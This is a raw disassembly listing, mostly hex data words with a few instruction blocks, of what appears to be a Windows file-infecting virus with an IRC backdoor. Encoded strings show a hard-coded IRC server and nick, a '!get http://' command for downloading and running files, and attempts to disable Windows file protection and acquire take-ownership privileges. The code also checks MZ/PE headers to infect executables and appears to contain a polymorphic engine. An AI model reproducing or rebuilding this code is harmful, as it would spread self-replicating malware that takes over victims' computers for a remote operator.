dd 103F22h, 0FF0CC483h, 103F2A95h, 8C48300h, 30958DC3h
dd 3300103Eh, 52006AC9h, 32003068h, 51C48B00h, 50406A51h
dd 83186A51h, 6A5408C0h, 95FF500Eh, 103F1Eh, 3320C483h
dd 0FC085D2h, 0DAF7C299h, 0C3C22358h, 0E8FF3357h, 0FFFFFFC1h
dd 0A5840Fh, 68500000h, 7328h, 6AD48Bh, 406ACC8Bh, 10000068h
dd 52026A00h, 2868006Ah, 6A000073h, 50535100h, 3F1295FFh
dd 595F0010h, 3E6295FFh, 0FF850010h, 8D8B7174h, 101590h
dd 958D0CE3h, 101000h, 5357D103h, 858BD2FFh, 103EFEh, 29168F8Dh
dd 2BE80000h, 8BFFFFFFh, 103F1685h, 638F8D00h, 0E8000029h
dd 0FFFFFF1Ah, 3F02858Bh, 8F8D0010h, 296Ah, 0FFFF09E8h
dd 6858BFFh, 8500103Fh, 8D2074C0h, 29778Fh, 0FEF4E800h
dd 858BFFFFh, 103F0Eh, 0B74C085h, 29848F8Dh, 0DFE80000h
dd 8BFFFFFEh, 55C35FC7h, 0E8h, 0ED815D00h, 101B24h, 858DC933h
dd 101EAFh, 51515451h, 0FF515150h, 103E8E95h, 24048700h
dd 3E6295FFh, 0C25D0010h, 0E8550004h, 0
dd 53ED815Dh, 6A00101Bh, 1E958DFFh, 5000101Bh, 2420CD52h
dd 83002A00h, 0C7660CC4h, 101B6485h, 0C720CD00h, 101B6685h
dd 2A002400h, 6AC35D00h, 9E8581Ah, 8D000000h, 0FEAA6142h
dd 0C3F075C9h, 3F7C9569h, 84050010h, 89420808h, 103F7C95h
dd 0C3E2F700h, 0E855h, 815D0000h, 101BADEDh, 809D8B00h
dd 8300103Fh, 8247Ch, 0B9840Fh, 0EC810000h, 208h, 1046854h
dd 95FF0000h, 103EB6h, 848DFC8Bh, 10424h, 6A5000h, 4E8h
dd 52525600h, 95FF5700h, 103EB2h, 978DC933h, 104h, 26A5151h
dd 68016A51h, 40000000h, 7E95FF52h, 9600103Eh, 5B74F685h
dd 4685450h, 57000001h, 2024B4FFh, 0FF000002h, 103F5E95h
dd 0C0855900h, 14E31674h, 6AD48B50h, 57515200h, 0F695FF56h
dd 5900103Eh, 0D075C085h, 6295FF56h, 8D00103Eh, 57524457h
dd 8D58446Ah, 10497h, 0C033AB00h, 0F359106Ah, 505050ABh
dd 50505050h, 8695FF52h, 8100103Eh, 208C4h, 2474FF00h
dd 4E95FF08h, 5300103Fh, 3F4E95FFh, 0C25D0010h, 3E800004h
dd 4601750Ah, 158C8D8Bh, 19E30010h, 1000958Dh, 0D1030010h
dd 84D2FF56h, 1F880FC0h, 0F000001h, 11084h, 3A3E8000h
dd 80461075h, 840F003Eh, 101h, 75203E80h, 3E8146F1h, 474E4950h
dd 0CF8B4275h, 4F0146C6h, 6A51CE2Bh, 53565100h, 3F4695FFh
dd 3B590010h, 0DF850FC1h, 8D000000h, 101EA385h, 68006A00h
dd 0Ch, 95FF5350h, 103F46h, 0C3Dh, 0BF850F00h, 0E9000000h
dd 0B1h, 52503E81h, 850F5649h, 0A5h, 0AC08C683h, 840F0D3Ch
dd 99h, 0F375203Ch, 0F3A3CACh, 8C85h, 200DAD00h, 3D202020h
dd 74656721h, 3CAC7F75h, 817C7520h, 6820FF7Eh, 71757474h
dd 70037E81h, 752F2F3Ah, 0FF47C668h, 0BA310F00h, 2710h
dd 0FF52E2F7h, 103EE695h, 50C03300h, 0E8505050h, 9, 6E776F44h
dd 64616F6Ch, 5695FF00h, 8500103Fh, 333674C0h, 808589C9h
dd 5100103Fh, 20068h, 56515180h, 5A95FF50h, 8D00103Fh
dd 101BA795h, 0C9335000h, 52505154h, 95FF5151h, 103E8Eh
dd 0FF240487h, 103E6295h, 80C3F800h, 10157F8Dh, 0C3F90100h
dd 16A016Ah, 73FF33FFh, 8515FF04h, 335A74C0h, 0B3D08BDBh
dd 3C50030Bh, 1DCBB58Dh, 0BA8B0010h, 10Ch, 1088A8Bh, 0F8030000h
dd 8B60CB2Bh, 61A6F3CBh, 0E2470574h, 832EEBF5h, 8B530FC7h
dd 0D48B57CCh, 406A5450h, 0FF6A5251h, 3F2295FFh, 8D8B0010h
dd 103E96h, 2B0CC483h, 7E983CFh, 6A07C7h, 4F8900E8h, 4F53C303h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
dd 50000002h, 0D08F7255h, 786F7270h, 692E6D69h, 61676372h
dd 7978616Ch, 6C702Eh, 4B43494Eh, 636D6F20h, 6376726Dh
dd 53550A69h, 63205245h, 4E494F4Ah, 69762620h, 0A757472h
dd 0E855h, 815D0000h, 101EB5EDh, 7F85C600h, 1015h, 3EBA95FFh
dd 0E8C10010h, 6A3C741Fh, 72B58B1Eh, 5900103Eh, 752E3CACh
dd 3E81662Ah, 23751DFFh, 3F76BD8Dh, 768B0010h, 66A55702h
dd 0EC858DA5h, 8F001038h, 10391285h, 4689FA00h, 0FE4E8CFAh
dd 0E201B1FBh, 0E850EBCFh, 0FFFFFB21h, 8247C83h, 0E8447504h
dd 8, 2E434653h, 4C4C44h, 3EC695FFh, 0C00B0010h, 6A930D74h
dd 95FF5302h, 103E6Eh, 0E893D0FFh, 0FFFFFE97h, 0BE8h, 43465300h
dd 2E534F5Fh, 4C4C44h, 3EC695FFh, 7CE80010h, 0E8FFFFFEh
dd 0FFFFF600h, 12D48DFFh, 0C9330010h, 4324858Dh, 51510010h
dd 51505151h, 95FF5151h, 103EC2h, 0BE8h, 45535500h, 2E323352h
dd 4C4C44h, 3EC695FFh, 0AE80010h, 77000000h, 69727073h
dd 4166746Eh, 95FF5000h, 103E6Eh, 3E768589h, 310F0010h
dd 19858D8Dh, 85890010h, 103F7Ch, 0C695FF51h, 9300103Eh
dd 468h, 92B58D00h, 59001019h, 3F62BD8Dh, 0C2E80010h, 66FFFFF5h
dd 1E7585C7h, 50000010h, 1E77A583h, 8D000010h, 101E3595h
dd 6A545000h, 52006A01h, 268h, 6695FF80h, 8500103Fh, 22755AC0h
dd 1E688D8Dh, 6A520010h, 75B58D06h, 5400101Eh, 51505056h
dd 6A95FF52h, 5800103Fh, 3F6295FFh, 85C60010h, 104183h
dd 0CE800h, 53570000h, 334B434Fh, 4C442E32h, 95FF004Ch
dd 103EC6h, 76893h, 0B58D0000h, 1018E9h, 32BD8D59h, 0E800103Fh
dd 0FFFFF53Dh, 0CE8h, 4E495700h, 54454E49h, 4C4C442Eh
dd 0C695FF00h, 8500103Eh, 35840FC0h, 93000002h, 568h, 27B58D00h
dd 59001019h, 3F4EBD8Dh, 6E80010h, 83FFFFF5h, 103F52BDh
dd 840F0000h, 210h, 190EC81h, 68540000h, 101h, 3F3295FFh
dd 0C4810010h, 190h, 6AD48B50h, 95FF5200h, 103F52h, 7559C085h
dd 1388680Dh, 95FF0000h, 103EE6h, 0BD83E2EBh, 101E77h
dd 8D297500h, 101E7B85h, 95FF5000h, 103F3Eh, 840FC085h
dd 189h, 8B0C408Bh, 8F30FF00h, 101E7785h, 8385C600h, 1001041h
dd 16A006Ah, 95FF026Ah, 103F4Ah, 0FFFF883h, 16084h, 958D9300h
dd 101E73h, 5352106Ah, 3F3A95FFh, 0C0850010h, 140850Fh
dd 0BD8D0000h, 101E94h, 3CE808B1h, 68FFFFFAh, 94h, 89E62B5Eh
dd 0FF542434h, 103EBE95h, 0A2BD8D00h, 0B100101Eh, 0FA1DE801h
dd 958DFFFFh, 101E8Fh, 1468006Ah, 52000000h, 4695FF53h
dd 8D00103Fh, 8D142444h, 10432495h, 0B60F5000h, 24448B0Ah
dd 8E0C114h, 12014A02h, 4A12024Ah, 24440B03h, 0FE18008h
dd 5108E0C1h, 1024440Bh, 8D5032FFh, 103F84BDh, 1CE800h
dd 2E250000h, 2E207836h, 3A202E20h, 2E252525h, 78257838h
dd 0A732520h, 4E494F4Ah, 0FF570020h, 103E7695h, 0ACC48100h
dd 6A000000h, 53575000h, 3F4695FFh, 8D8B0010h, 101598h
dd 1BE3006Ah, 510DC96Bh, 5E8h, 64252600h, 0FF57000Ah, 103E7695h
dd 0CC48300h, 680BEB50h, 7, 1EA8BD8Dh, 53570010h, 3F4695FFh
dd 0C0850010h, 0B58D547Eh, 103F84h, 1598A583h, 8D000010h
dd 1041838Dh, 6ACE2B00h, 53565100h, 3F4295FFh, 0F8830010h
dd 912F7E00h, 0B58DFE8Bh, 103F84h, 0AEF20DB0h, 0E8601075h
dd 0FFFFFA2Ah, 0E3177261h, 1778D09h, 0CF8BEAEBh, 0BD8DCE2Bh
dd 103F84h, 0F787A4F3h, 0FF53B9EBh, 103F3695h, 7FBD8000h
dd 1001015h, 30682A74h, 0FF000075h, 103EE695h, 83BD8000h
dd 1041h, 85C71174h, 101E77h, 0
dd 418385C6h, 0E9000010h, 0FFFFFE08h, 158885C7h, 10h, 0C25D8000h
dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h
dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h
dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h
dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h
dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h
dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h
dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h
dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 0D3A7469h
dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h
dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h
dd 49202165h, 20732774h, 6574616Ch, 0A2A1A821h, 0A614294Ch
dd 90878810h, 3752488Fh, 0E1519440h, 0B1FAE586h, 6CCC5C27h
dd 375232C2h, 8000B940h, 0B8B35265h, 68988FD8h, 0C7h, 14h dup(0)
dd 0A5836000h, 1042F4h, 0F8A58300h, 1042h, 1443B70Fh, 0F18538Dh
dd 3064BB7h, 24448BD0h, 0C422B24h, 423B1972h, 8B147308h
dd 422B1442h, 0F495890Ch, 89001042h, 1042F885h, 8305EB00h
dd 0D9E228C2h, 4C261h, 24678588h, 64E80010h, 68000000h
dd 20h, 2394858Dh, 39590010h, 830C7418h, 0F7E204C0h, 42D085FFh
dd 0F7C30010h, 678D03D9h, 0E3001024h, 0FC70FF10h, 0E883008Fh
dd 89F6E204h, 1023949Dh, 3A8300h, 322B0574h, 8D107203h
dd 5B58FC4Eh, 3A835Eh, 32FF0474h, 72FF03EBh, 0FF57E810h
dd 0CE2BFFFFh, 42F88D2Bh, 3580010h, 8FC3344Bh, 1042D485h
dd 0D085C700h, 1042h, 0E8000000h, 3Ch, 42D0858Bh, 0A9E80010h
dd 0E8FFFFF6h, 18h, 42D0BD83h, 75000010h, 109D8908h, 0EB001024h
dd 0D08DFF9Ch, 0C3001042h, 42D4858Fh, 95890010h, 1042D0h
dd 3E8h, 0C3C93300h, 80938Bh, 0E8520000h, 0FFFFFEEDh, 42F89503h
dd 0D6030010h, 0C7A83h, 107840Fh, 7A830000h, 840F0010h
dd 0FDh, 500C428Bh, 0FFFEC8E8h, 0F88503FFh, 3001042h, 88A50C6h
dd 7400F980h, 2EF98019h, 0EB400374h, 1488BF1h, 0DFDFE181h
dd 0F981DFDFh, 4C4C44h, 2B59EC75h, 0FAF983C8h, 0B78F0Fh
dd 81660000h, 3233FE78h, 0AB850Fh, 83560000h, 575003Ah
dd 0EB104A8Bh, 30A8B02h, 72E851F1h, 3FFFFFEh, 1042F8B5h
dd 0C085AD00h, 840FFB78h, 84h, 42F8B5FFh, 0E8500010h, 0FFFFFE55h
dd 42F88503h, 858F0010h, 1042F8h, 53240403h, 3302C083h
dd 8B60FDBh, 0C98012E3h, 24C15320h, 1C290424h, 240C2924h
dd 0E9EB405Bh, 0D70FFB81h, 3E74DDBBh, 45A8FB81h, 3674DB6Eh
dd 3B59FB81h, 2E74FFA1h, 22D6FB81h, 2674ACB5h, 0E993FB81h
dd 1E74F358h, 0E97DFB81h, 1674F358h, 3F46FB81h, 0E74E125h
dd 3F30FB81h, 674E125h, 42D495FFh, 0E95B0010h, 0FFFFFF71h
dd 14C2835Eh, 0FFFEEFE9h, 6A01C3FFh, 49E85804h, 88FFFFF5h
dd 10264195h, 31B86600h, 0C0E20218h, 0E20203E4h, 66AAB66h
dd 0F52EE858h, 0C283FFFFh, 6AD18708h, 21E85805h, 80FFFFF5h
dd 0B7303FAh, 850250B0h, 102641h, 6A27EBAAh, 80AA5868h
dd 187503FAh, 1E811B0h, 0B8FFFFF5h, 1, 0D74D284h, 0CAFEE0D1h
dd 5EBF6EBh, 0B8h, 0BFE2AB80h, 0CC958DC3h, 2B001039h, 0C3DAF7D7h
dd 39C085F7h, 10h, 950F1000h, 0BE0C1C0h, 39BE85F6h, 75010010h
dd 890D6606h, 0F613EB25h, 1039BE85h, 6750200h, 25310D66h
dd 0D6604EBh, 0AB662501h, 0FFFFBCE8h, 34438BFFh, 42E89589h
dd 0C3AB0010h, 39C085F7h, 10h, 950F1000h, 0AABC04C0h, 0FFFF9CE8h
dd 0EC9589FFh, 0F6001042h, 1039BE85h, 4750100h, 2EB310Fh
dd 0C3ABC02Bh, 39C085F7h, 10h, 27741000h, 39BA858Ah, 0E0C10010h
dd 8B0D660Bh, 0B0AB6645h, 858AAAF8h, 1039BAh, 51BE0C1h
dd 6896467h, 66C033ABh, 0B812EBABh, 58F64h, 0BA858AABh
dd 4001039h, 18E0C158h, 85C6C3ABh, 10279Ch, 0B025EB09h
dd 6620EBFCh, 6600EBB8h, 6A19EBABh, 9E85804h, 8DFFFFF4h
dd 0E0C1D204h, 89056608h, 0EBAB66C0h, 0AA90B003h, 0E858156Ah
dd 0FFFFF3F0h, 279C8580h, 80060010h, 2F7308FAh, 0C374D284h
dd 0C374CAFEh, 0C774CAFEh, 0D974CAFEh, 0C74CAFEh, 2 dup(0F74CAFEh)
dd 0CBEBF9B0h, 0B0AA87B0h, 0B0C4EBDBh, 0B0C0EBF5h, 0C3BCEBF8h
dd 39C085F7h, 20000010h, 86B00000h, 4040275h, 8AFE4F8Dh
dd 1039B8A5h, 80AB6600h, 77505FCh, 4F8000B0h, 0E8AA40FFh
dd 0FFFFFF62h, 39C085F7h, 40000010h, 0B8660000h, 2753166h
dd 0AB6629B4h, 850A18B0h, 1039BAh, 0AA03E0C0h, 0FFFF3DE8h
dd 0F788B0FFh, 1039C085h, 800000h, 0B0027500h, 0B8A58A86h
dd 66001039h, 5FC80ABh, 0B00775h, 40FF4F80h, 0BD8DC3AAh
dd 1039CCh, 0FFFF0DE8h, 0C085F7FFh, 1039h, 74004000h, 0AA60B003h
dd 39C085F7h, 10h, 7741000h
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
dw 0
dd 0F0840F02h, 0B0000000h, 89ABAAE8h, 1042D8BDh, 0FECCE800h
dd 0E8B0FFFFh, 0BD89ABAAh, 1042DCh, 0FFFEBDE8h, 0C085F7FFh
dd 3001039h, 74000000h, 0C085F71Ah, 1039h, 74020000h, 0FE2EE80Ah
dd 9BE8FFFFh, 0B0FFFFFEh, 8BABAAE9h, 1042D885h, 2BCF8B00h
dd 0E0BD89C8h, 89001042h, 67B8FC48h, 0AB36FF64h, 0AB66C033h
dd 39C085F7h, 30010h, 13740000h, 39BE85F6h, 74800010h
dd 0FDAAE80Ah, 5BE8FFFFh, 0B8FFFFFEh, 26896467h, 66C033ABh
dd 0C085F7ABh, 3001039h, 74000000h, 0BE85F65Ah, 80001039h
dd 81E80A75h, 0E8FFFFFDh, 0FFFFFE32h, 0FFFD02E8h, 0E820B0FFh
dd 0FFFFFB14h, 0B86639E3h, 0AB6615FFh, 958BAB91h, 1039C0h
dd 0C2F7D2F7h, 3, 0DCE81475h, 0B0FFFFFCh, 0FAEEE81Fh, 0B866FFFFh
dd 0AB6615FFh, 0CF8BAB91h, 42E0858Bh, 0C82B0010h, 0F7FC4889h
dd 1039C085h, 300h, 0F7387400h, 1039C085h, 0
dd 0F72C740Ch, 1039C085h, 0
dd 0E80A7502h, 0FFFFFDC2h, 0FFFD4BE8h, 0C085F7FFh, 1039h
dd 74080000h, 0FDACE80Ah, 61E8FFFFh, 0F7FFFFFDh, 1039C085h
dd 400h, 0E8177400h, 0FFFFFD96h, 0FEC029B8h, 8B8ABC8h
dd 0AB0474C0h, 0EBF875B8h, 7FE8AB67h, 0F7FFFFFDh, 1039C085h
dd 800h, 80727500h, 1039BEBDh, 69740000h, 0FFFD65E8h, 1829B8FFh
dd 0A50AC929h, 1039BAh, 0A03E4C0h, 1039BAA5h, 4BE8AB00h
dd 0B0FFFFFDh, 858AAAB1h, 1039BEh, 0FD3CE8AAh, 0B60FFFFFh
dd 1039BA85h, 0C0048D00h, 0E0C14004h, 668DB008h, 0AA01B0ABh
dd 0FD20E857h, 3C29FFFFh, 0E2B86624h, 85F759FBh, 1039C0h
dd 10h, 49B00774h, 75B866AAh, 66E102FAh, 0FCFCE8ABh, 0E8B0FFFFh
dd 0ABC033AAh, 42C4BD89h, 85F70010h, 1039C0h, 20h, 0E8573B75h
dd 0FFFFFCDEh, 39C085F7h, 10h, 18748000h, 42F0BD89h, 39E80010h
dd 0E8FFFFFDh, 0FFFFFCC2h, 0E8AAC3B0h, 0FFFFFCBAh, 0B0CF8B5Ah
dd 0ACA2B58h, 1039B885h, 0FC4A8900h, 0FCA4E8AAh, 0B866FFFFh
dd 85F7C081h, 1039C0h, 40h, 0C4800374h, 0B8A50A28h, 66001039h
dd 0C8BD89ABh, 0AB001042h, 39C085F7h, 10h, 9754000h, 850250B0h
dd 1039B8h, 0C085F7AAh, 80001039h, 75000000h, 0AB8B00Bh
dd 1039B985h, 3DEBAA00h, 1831B866h, 39C085F7h, 1000010h
dd 2740000h, 0A50A29B0h, 1039B9h, 0A03E4C0h, 1039B9A5h
dd 66AB6600h, 0F7F081B8h, 1039C085h, 20000h, 0B4027500h
dd 0B9A50AC8h, 66001039h, 0E4BD89ABh, 0B8001042h, 29CCh
dd 0C085F7ABh, 8001039h, 74000000h, 0FBFCE871h, 85F7FFFFh
dd 1039C0h, 400h, 0B8B00B75h, 39BA850Ah, 0EBAA0010h, 0C085F74Dh
dd 1039h, 75000008h, 83B86611h, 0BAA50AE0h, 66001039h
dd 0AAC033ABh, 0B86615EBh, 0A50A1829h, 1039BAh, 0A03E4C0h
dd 1039BAA5h, 0F7AB6600h, 1039C085h, 100000h, 81B86600h
dd 800374C0h, 0A50A08C4h, 1039BAh, 0B60FAB66h, 1039BE85h
dd 8BE8AB00h, 0F7FFFFFBh, 1039C085h, 0
dd 0B00E7440h, 0B8850250h, 0AA001039h, 0FFFB71E8h, 0FE4F8DFFh
dd 42CC8D89h, 85F70010h, 1039C0h, 80000000h, 0E8B01774h
dd 0F0858BAAh, 2B001042h, 4E883C7h, 0F0BD89ABh, 0EB001042h
dd 0FBB2E805h, 3BE8FFFFh, 0F7FFFFFBh, 1039C085h, 1000000h
dd 0B00B7500h, 0B8850A40h, 0AA001039h, 0B8660FEBh, 0A50AC083h
dd 1039B8h, 1B0AB66h, 0C085F7AAh, 1039h, 75000200h, 0C085F72Fh
dd 1039h, 75000400h, 0AC0B01Ah, 1039BA85h, 0BFA58A00h
dd 0C1001039h, 0B86610E0h, 0B0AB8166h, 0B008EB00h, 0BA850A40h
dd 0AA001039h, 39C085F7h, 10h, 10750008h, 0E883B866h, 39B9A50Ah
dd 0AB660010h, 8EB01B0h, 850A48B0h, 1039B9h, 0FAB0E8AAh
dd 85F7FFFFh, 1039C0h, 100000h, 257575B1h, 0F883B866h
dd 39B9A50Ah, 0AB660010h, 29AAC033h, 1042CCBDh, 0C085F700h
dd 1039h, 75002000h, 0EB77B11Fh, 9B8661Bh, 0B9A50A18h
dd 0C0001039h, 0A50A03E4h, 1039B9h, 0BD29AB66h, 1042CCh
dd 0A58AC18Ah, 1042CCh, 58B0AB66h, 39B88502h, 0E8AA0010h
dd 0FFFFFA4Ah, 39C085F7h, 30010h, 2C740200h, 39C085F7h
dd 10h, 20750800h, 39C085F7h, 10h, 0A750600h, 0FFF9AFE8h
dd 0FA1CE8FFh, 0D1E8FFFFh, 0E8FFFFF9h, 0FFFFFA12h, 39C085F7h
dd 10h, 8741000h, 0E8AAC9B0h, 0FFFFF9FEh, 39C085F7h, 10h
dd 2A740040h, 852A07B0h, 1039B8h, 0D1AE0C1h, 240889h, 39B8A502h
dd 0E4C00010h, 4C48003h, 0F9D0E8ABh, 61B0FFFFh, 0F9C8E8AAh
dd 0B866FFFFh, 0A50AE0FFh, 1039B8h, 0B7E8AB66h, 0F7FFFFF9h
dd 1039C085h, 2000h, 0F76F7400h, 1039C085h, 0
dd 8B1F7480h, 0F08D8BC7h, 2B001042h, 0FC4189C1h, 0FFF9FFE8h
dd 0F988E8FFh, 0C3B0FFFFh, 0F980E8AAh, 0C78BFFFFh, 42C48D8Bh
dd 0C12B0010h, 0B0FC4189h, 0B8850A58h, 0AA001039h, 0FFF965E8h
dd 0C085F7FFh, 1039h, 74008000h, 50B8660Ch, 0B8850AC3h
dd 0EB001039h, 0FFB8660Ah, 0B8A50AE0h, 66001039h, 0F93CE8ABh
dd 85F7FFFFh, 1039C0h, 2000003h, 0CF8B5F74h, 42DC858Bh
dd 0C82B0010h, 33FC4889h, 0C085F7C9h, 1039h, 75010000h
dd 0B8858D0Eh, 8A001039h, 0F9804008h, 8DF87303h, 2444CD04h
dd 0E0C10010h, 0AB8BB008h, 0B86606E3h, 0AB66C031h, 808FB866h
dd 0B868h, 66E10200h, 85AB58ABh, 660675C9h, 66C031B8h
dd 0AAC3B0ABh, 0FFF8D1E8h, 0CC858DFFh, 0F7001039h, 1039C085h
dd 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
push edi
sub edi, eax
pop eax
jmp short loc_3100AFC2
; ---------------------------------------------------------------------------
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3100AFC2: ; CODE XREF: UPX2:3100AFA7�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_3100AFE2
neg eax
loc_3100AFE2: ; CODE XREF: UPX2:3100AFDE�j
stosd
retn 4
; ---------------------------------------------------------------------------
dw 5756h
dd 4300BD83h, 0F000010h, 1D984h, 0DE800h, 454B0000h, 4C454E52h
dd 442E3233h, 0FF004C4Ch, 103EAE95h, 14858900h, 53001043h
dd 33C588Bh, 2873FFD8h, 0E834438Bh, 0FFFFF4E5h, 42F4958Bh
dd 35B0010h, 85890C42h, 104318h, 89084203h, 10431C85h
dd 28738B00h, 80B3FFh, 0BEE80000h, 8BFFFFF4h, 1042F4BDh
dd 0B2E85600h, 8BFFFFF4h, 1042F495h, 84A8B00h, 2B0C4A03h
dd 5E983CEh, 160880Fh, 840F0000h, 15Ah, 42F8B503h, 0B5030010h
dd 1042B4h, 0FE83CACh, 0A285h, 4468D00h, 42B4852Bh, 6030010h
dd 0F46FE850h, 0BD83FFFFh, 1042F4h, 3B0B7500h, 830F0C47h
dd 11Bh, 95390CEBh, 1042F4h, 10D850Fh, 85030000h, 1042B4h
dd 0FF388166h, 0FC850F25h, 8B000000h, 432B0240h, 32E85034h
dd 39FFFFF4h, 1042F4BDh, 0E4850F00h, 3000000h, 1042F885h
dd 0B4850300h, 8B001042h, 0C472B00h, 0CD820Fh, 473B0000h
dd 0C4830F08h, 83000000h, 470302C0h, 0B4850314h, 52001042h
dd 14B5FF50h, 0FF001043h, 103E6E95h, 0C0855A00h, 0B7850Fh
dd 9CE90000h, 3C000000h, 94850FFFh, 80000000h, 850F153Eh
dd 8Bh, 2B01468Bh, 0E8503443h, 0FFFFF3C1h, 42F4BD39h, 77750010h
dd 42F88503h, 85030010h, 1042B4h, 43208589h, 8B0010h, 4318853Bh
dd 8720010h, 431C853Bh, 69720010h, 3Dh, 0E8377270h, 1Fh
dd 8BFC4E8Dh, 3022BC1h, 853B1042h, 104320h, 0C4830C75h
dd 8F31FF10h, 611C2444h, 8FC31BEBh, 1042D485h, 0B58B6000h
dd 1042B4h, 0FFF45FE8h, 0A961FFh, 75800000h, 0C472B0Eh
dd 473B0972h, 3C820F08h, 49FFFFFFh, 0FEB2850Fh, 3C8BFFFFh
dd 0C0A78124h, 0FF000029h, 0EBFFBFFFh, 244A8142h, 0E0000060h
dd 8BC0334Eh, 8587240Ch, 104300h, 42FC8589h, 0B98D0010h
dd 29C4h, 42B48503h, 0A5660010h, 0C62B4EA5h, 2B144203h
dd 46C60C42h, 81C7E8FBh, 54h, 5, 5FFC4689h, 0FF57C35Eh
dd 103EBA95h, 1FE8C100h, 11A850Fh, 54500000h, 0FF6A286Ah
dd 3F1A95FFh, 0C0850010h, 5880F5Fh, 0E8000001h, 0FFFFE458h
dd 11E8h, 74655300h, 656C6946h, 75636553h, 79746972h, 0B5FF0041h
dd 104288h, 3E6E95FFh, 85890010h, 104290h, 19E8h, 54655300h
dd 4F656B61h, 72656E77h, 70696873h, 76697250h, 67656C69h
dd 0E8570065h, 0FFFFE829h, 13E8h, 52655300h, 6F747365h
dd 72506572h, 6C697669h, 656765h, 0E80BE857h, 12E8FFFFh
dd 53000000h, 63614265h, 5070756Bh, 69766972h, 6567656Ch
dd 0EEE85700h, 0E8FFFFE7h, 18h, 68436553h, 65676E61h, 69746F4Eh
dd 72507966h, 6C697669h, 656765h, 0E7CBE857h, 5450FFFFh
dd 3DCC858Dh, 646A0010h, 57016A50h, 3F2695FFh, 3C890010h
dd 6295FF24h, 2A00103Eh, 84BD8DC0h, 50001041h, 0B5FF5050h
dd 103DCCh, 4000168h, 16A5400h, 9095FF57h, 54001042h, 0FF57046Ah
dd 10429095h, 14C48300h, 4288B5FFh, 95FF0010h, 103E9Eh
dd 0B58DC35Fh, 104184h, 0A295FF56h, 8300103Eh, 840FFFF8h
dd 0BBh, 42948589h, 6A0010h, 0DE95FF56h, 8500103Eh, 0A4840FC0h
dd 2B000000h, 6A5050C0h, 16A5003h, 68h, 95FF56C0h, 103E7Eh
dd 0FFFF883h, 60784h, 98858900h, 8D001042h, 10429C8Dh
dd 0A4958D00h, 51001042h, 50006A52h, 3EAA95FFh, 0F8830010h
dd 0D5840FFFh, 6A000005h, 98B5FF00h, 0FF001042h, 103EA695h
dd 0FFF88300h, 5BE840Fh, 85890000h, 1042ACh, 0C303C933h
dd 6A515051h, 0B5FF5104h, 104298h, 3E8295FFh, 0C0850010h
dd 59A840Fh, 0C9330000h, 42B08589h, 51510010h, 1F6851h
dd 0FF50000Fh, 103ECA95h, 0FC08500h, 55384h, 0B4858900h
dd 0C3001042h, 7327B8h, 384B8B00h, 39C085F7h, 10h, 6752000h
dd 10698503h, 0D2330010h, 0F1F7C103h, 8589E1F7h, 1042C0h
dd 29CBB8h, 3C4B8B00h, 10698503h, 0D2330010h, 0F1F7C103h
dd 8589E1F7h, 1042B8h, 4BB70FC3h, 35E3F906h, 0F18538Dh
dd 31443B7h, 0C16B49D0h, 81D00328h, 69775F3Ah, 1D74F96Eh
dd 10C7A83h, 4B8BE072h, 14428B3Ch, 8D104203h, 0F7FF4844h
dd 3BC123D9h, 1042AC85h, 548BC300h, 0C0331024h, 0B8828Fh
dd 8BC30000h, 8D0BEBCFh, 104184BDh, 0DF8BFC00h, 3CACC933h
dd 3C067261h, 2C02777Ah, 5C3CAA20h, 2E3CEC74h, 3CDD74h
dd 0C9E3E875h, 453D018Bh, 74004558h, 43533D0Bh, 850F0052h
dd 0FFFFFF33h, 573D038Bh, 0F434E49h, 0FFFF2684h, 43573DFFh
dd 840F4E55h, 0FFFFFF1Bh, 3343573Dh, 10840F32h, 3DFFFFFFh
dd 4F545350h, 0FF05840Fh, 0DB33FFFFh, 0FFFE2DE8h, 0E81075FFh
dd 0FFFFFCFAh, 0FFFE21E8h, 0EC840FFFh, 33FFFFFEh, 16E8D2h
dd 63E80000h, 0E8FFFFFFh, 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 10344Fh
jmp loc_3100B94A
; ---------------------------------------------------------------------------
dd 8B32FF64h, 1042B4B5h, 22896400h, 4D3E8166h, 0E3850F5Ah
dd 8B000003h, 0DE033C5Eh, 503B8166h, 0D3850F45h, 0F7000003h
dd 20001643h, 850F0000h, 3C6h, 25C43F6h, 3BC840Fh, 438B0000h
dd 0A0A03D08h, 840FA0A0h, 3AEh, 2020203Dh, 0A3840F20h
dd 8B000003h, 0C88Bh, 5116E300h, 0FFEF54E8h, 0F88D03FFh
dd 3001042h, 406183CEh, 44618300h, 0FE9BE800h, 820FFFFFh
dd 37Ah, 42FCA583h, 8B000010h, 4A8B0842h, 73C12B10h, 0EBC03304h
dd 89C80305h, 8589104Ah, 1042BCh, 0B80C4A03h, 10000h, 0E68AE851h
dd 9530FFFFh, 1039BEh, 0B53020B1h, 1039BFh, 0C9FE206Ah
dd 0E8147858h, 0FFFFE670h, 940FD285h, 31E2D3C2h, 1039C095h
dd 0F7E5EB00h, 1039C085h, 0
dd 0F7227402h, 1039C085h, 300h, 810C7500h, 1039C0A5h, 0FFFFFF00h
dd 810AEBF7h, 1039C08Dh, 0
dd 66810h, 68590000h, 6, 0E622E858h, 858AFFFFh, 1039B8h
